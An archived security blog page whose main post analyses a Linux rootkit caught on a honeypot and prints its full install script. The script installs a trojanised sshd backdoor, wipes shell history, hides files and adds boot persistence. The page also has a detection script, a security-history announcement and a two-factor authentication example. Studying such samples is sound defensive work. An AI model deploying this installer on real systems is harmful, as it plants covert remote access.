This Blog has Moved!

This blog is moving to


Thank you for visiting! Content will remain here for archival purposes.

Linux Rootkit "bum.pdf" dropped onto my Honeypot Today

A malicious user from Romania using Putty dropped off a Linux rootkit on my honeypot today.

From my initial analysis it appears that the rootkit installs a hidden SSH server running on port 10001.

I haven't had much time to look through the entire package but if you'd like to browse what was dropped off I have uploaded everything to CaffSec-Malware-Analysis.

If you find anything interesting please feel free to post a comment.


UPDATE: I have found a related article on TMCNET.com talking about a backdoor installed on port 10001.  Read the article here: http://blog.tmcnet.com/blog/tom-keating/asterisk/hacked-asterisk-pbx-update.asp


Here is the install script for the main payload.  Interesting stuff!

#!/bin/bash
# Anti-forensics: keep this session out of the shell history. HISTFILE is the
# variable bash actually honours; the other three names are no-ops here.
unset HISTSAVE
unset HISTFILE
unset SAVEFILE
unset history
# Drop the bundled OpenSSL library the trojanised sshd links against.
mv libcrypto.so.4 /lib/
# Clear the immutable/append-only/undeletable attributes on the real zdump,
# delete it, install the backdoor sshd under the same name, then re-apply the
# attributes so rm and package updates cannot replace it.
chattr -suia /usr/sbin/zdump
rm -rf /usr/sbin/zdump
mv sshd /usr/sbin/zdump
chattr +suia /usr/sbin/zdump
# Hidden staging directory for the rest of the kit.
mkdir -p /usr/include/X11/.swap/
tar xvfz pic.tar.gz -C /usr/include/X11/.swap/ >>/dev/null
# The launcher is disguised as a C header file and executed right away.
mkdir -p /usr/include/sound
mv sound.so /usr/include/sound/
mv sounds.h /usr/include/sound/
chmod 770 /usr/include/sound/sounds.h
/usr/include/sound/sounds.h
# Persistence: append the launcher to rc.sysinit, padded with comments written
# in the style of the genuine file so the extra line is easy to overlook.
echo "# Now that we have all of our basic modules loaded and the kernel going,">>/etc/rc.sysinit
echo "# let's dump the syslog ring somewhere so we can find it later" >>/etc/rc.sysinit
echo "/usr/include/sound/sounds.h" >>/etc/rc.sysinit
sleep 10
echo "Enjoy your new box on port 10001"
# Remove the dropped archive directory.
cd ..
rm -rf rks*

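The script above leaves a small, fixed set of artifacts on the box. As an added example (not the attacker's code and not part of the original post), here is a read-only check a responder could run against a live host or a mounted image to look for them. The paths and the port number come straight from the install script; the ROOT prefix argument and the "OpenSSH string inside zdump" test are my own assumptions.

```shell
#!/bin/sh
# Added triage script (not from the original post or the rootkit author).
# Looks for the artifacts left by the "bum.pdf" installer. ROOT is an
# assumed prefix so the checks can run on a mounted image or a test tree.

# check_bum_indicators [ROOT]
# Prints one "FOUND: ..." line per indicator present under ROOT (default /).
check_bum_indicators() {
    root="${1%/}"                       # "" when checking the live root

    # 1. Launcher disguised as a header file, plus its companion object.
    for f in /usr/include/sound/sounds.h /usr/include/sound/sound.so; do
        [ -e "$root$f" ] && echo "FOUND: $root$f (payload hidden under /usr/include)"
    done

    # 2. Hidden staging directory unpacked from pic.tar.gz.
    [ -d "$root/usr/include/X11/.swap" ] &&
        echo "FOUND: $root/usr/include/X11/.swap (hidden directory)"

    # 3. Persistence: the installer appends the launcher path to rc.sysinit.
    if [ -f "$root/etc/rc.sysinit" ] &&
       grep -q '^/usr/include/sound/sounds.h' "$root/etc/rc.sysinit"; then
        echo "FOUND: $root/etc/rc.sysinit starts /usr/include/sound/sounds.h at boot"
    fi

    # 4. /usr/sbin/zdump replaced by an sshd binary. The genuine zdump (a tz
    #    tool) carries no OpenSSH strings, so a match is a strong sign of the
    #    swap (assumed heuristic).
    if [ -f "$root/usr/sbin/zdump" ] &&
       grep -a -q 'OpenSSH' "$root/usr/sbin/zdump"; then
        echo "FOUND: $root/usr/sbin/zdump contains OpenSSH strings (trojanised binary)"
    fi

    # 5. The installer runs chattr +suia on zdump. lsattr only works on
    #    ext-family filesystems, so errors are ignored.
    if command -v lsattr >/dev/null 2>&1 &&
       lsattr -d "$root/usr/sbin/zdump" 2>/dev/null | awk '{print $1}' | grep -q 'i'; then
        echo "FOUND: $root/usr/sbin/zdump is immutable (chattr +i)"
    fi
    return 0
}

# count_bum_indicators [ROOT]: prints the number of indicators found (0 = clean).
count_bum_indicators() {
    check_bum_indicators "$1" | grep -c '^FOUND:' || true
}

# live_listener_check: on the running host, report a listener on the port the
# installer announces ("Enjoy your new box on port 10001"). Needs ss.
live_listener_check() {
    command -v ss >/dev/null 2>&1 || { echo "ss not available, skipping port check"; return 0; }
    ss -ltn 2>/dev/null | awk '$4 ~ /:10001$/ {found=1} END {exit !found}' &&
        echo "FOUND: TCP listener on port 10001"
    return 0
}

# Usage: sh bum_check.sh [ROOT]; with no argument the live root is examined.
check_bum_indicators "${1:-}"
[ -z "${1:-}" ] && live_listener_check
```

Run it with no argument on a suspect host, or pass the mount point of an image taken from it; a clean system prints nothing. The OpenSSH-string test on zdump is the most useful of the file checks, because the attacker deliberately picked a name that already exists on the system.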

Perpetual Efforts in Futility - A History of Computing Security

I've threatened to do this for a while now...and I've finally got the motivation to do so.

I always said one of these days I need to write a book on all the crazy computer stuff I've seen over the years.  But then it dawned on me...there is no real "timeline" out there of the history of computing security.  Sure, some of it is interlaced between the pages of other computing history books or sites...but security is always an afterthought...a footnote.

So why "Perpetual Efforts in Futility"?  I've had that name picked out for years.  Security has always been a cat-and-mouse game of seeing who can outsmart the other.  Malware writers and other malicious individuals are always at odds with the security folks in a perpetual "war" which will never really end.

So, using Blogger, I'm going to begin piecing together a timeline of the history of computing security.  Eventually, when everything is complete to my satisfaction, maybe I'll even publish it as a book.  Who knows!

So without further delay, I present to you my first entry in "Perpetual Efforts in Futility" - an article about the very first computer worm "Creeper".


Please be sure to check "Perpetual Efforts in Futility" for future updates!

Google Two Factor Authentication - Protect Your Gmail and Google+ Account!

Have you secured your Google account with two-factor authentication yet?

If you have a smartphone such as a BlackBerry, Android or iPhone you can easily add an extra layer of protection to your Google account, including Gmail and Google+.

The authenticator app is available at no charge whatsoever.  Google provides instructions on how to install the app based upon your phone.

Once set up, you will be asked for a time-sensitive PIN provided by your smartphone when logging into your Google account.

Even if your account password is stolen or guessed your account will be secure!
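To show why the PIN is time-sensitive, here is an added example (not Google's code and not part of the original post) of the RFC 6238 TOTP computation that Google Authenticator and similar apps perform. The secret is provisioned once at enrolment; after that the phone only needs the current time, so the six-digit code changes every 30 seconds and a stolen password alone does not get an attacker in. The helper names, the use of openssl for HMAC-SHA1 and the one-step clock-drift tolerance are my own choices; the secret and expected codes are the published RFC 6238 test vectors.

```shell
#!/bin/sh
# Added example: RFC 4226 HOTP / RFC 6238 TOTP in POSIX sh. Not Google's code.
# Requires openssl for HMAC-SHA1.

# hex2bin HEX: write the raw bytes of a hex string to stdout (no xxd needed).
hex2bin() {
    h="$1"
    [ $(( ${#h} % 2 )) -eq 0 ] || return 1
    while [ -n "$h" ]; do
        pair="${h%"${h#??}"}"
        printf "\\$(printf '%03o' "0x$pair")"
        h="${h#??}"
    done
}

# hotp KEY_HEX COUNTER DIGITS: HMAC-based one-time password.
hotp() {
    key_hex="$1"; counter="$2"; digits="$3"
    # The counter is fed to HMAC as 8 big-endian bytes.
    mac=$(hex2bin "$(printf '%016x' "$counter")" |
          openssl dgst -sha1 -mac HMAC -macopt "hexkey:$key_hex" |
          awk '{print $NF}')
    # Dynamic truncation: the low nibble of the last byte selects a 4-byte
    # window; its top bit is cleared and the value reduced modulo 10^digits.
    offset=$((0x${mac#"${mac%?}"}))
    start=$((offset * 2 + 1))
    window=$(printf '%s' "$mac" | cut -c "$start-$((start + 7))")
    mod=1; i=0
    while [ "$i" -lt "$digits" ]; do mod=$((mod * 10)); i=$((i + 1)); done
    printf "%0${digits}d\n" $(( (0x$window & 0x7fffffff) % mod ))
}

# totp KEY_HEX UNIX_TIME [DIGITS] [STEP]: HOTP with counter = time / step.
# Google Authenticator uses 6 digits and a 30-second step.
totp() {
    hotp "$1" $(( $2 / ${4:-30} )) "${3:-6}"
}

# verify_totp KEY_HEX UNIX_TIME CODE: accept the current 30 s window and one
# window either side to tolerate phone/server clock drift. Prints 1 or 0.
verify_totp() {
    for skew in -1 0 1; do
        [ "$(totp "$1" $(( $2 + skew * 30 )))" = "$3" ] && { echo 1; return 0; }
    done
    echo 0
}

# RFC 6238 test secret "12345678901234567890" as hex (published test vector,
# never use it for a real account).
RFC_SECRET=3132333435363738393031323334353637383930
totp "$RFC_SECRET" 59              # 287082 per RFC 6238 appendix B
totp "$RFC_SECRET" 1111111109      # 081804
```

The verifier accepts three adjacent windows, which is the usual trade-off between rejecting a phone whose clock is a few seconds off and keeping the window in which a shoulder-surfed code stays valid to about a minute.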

Read more at Google's 2-step verification page.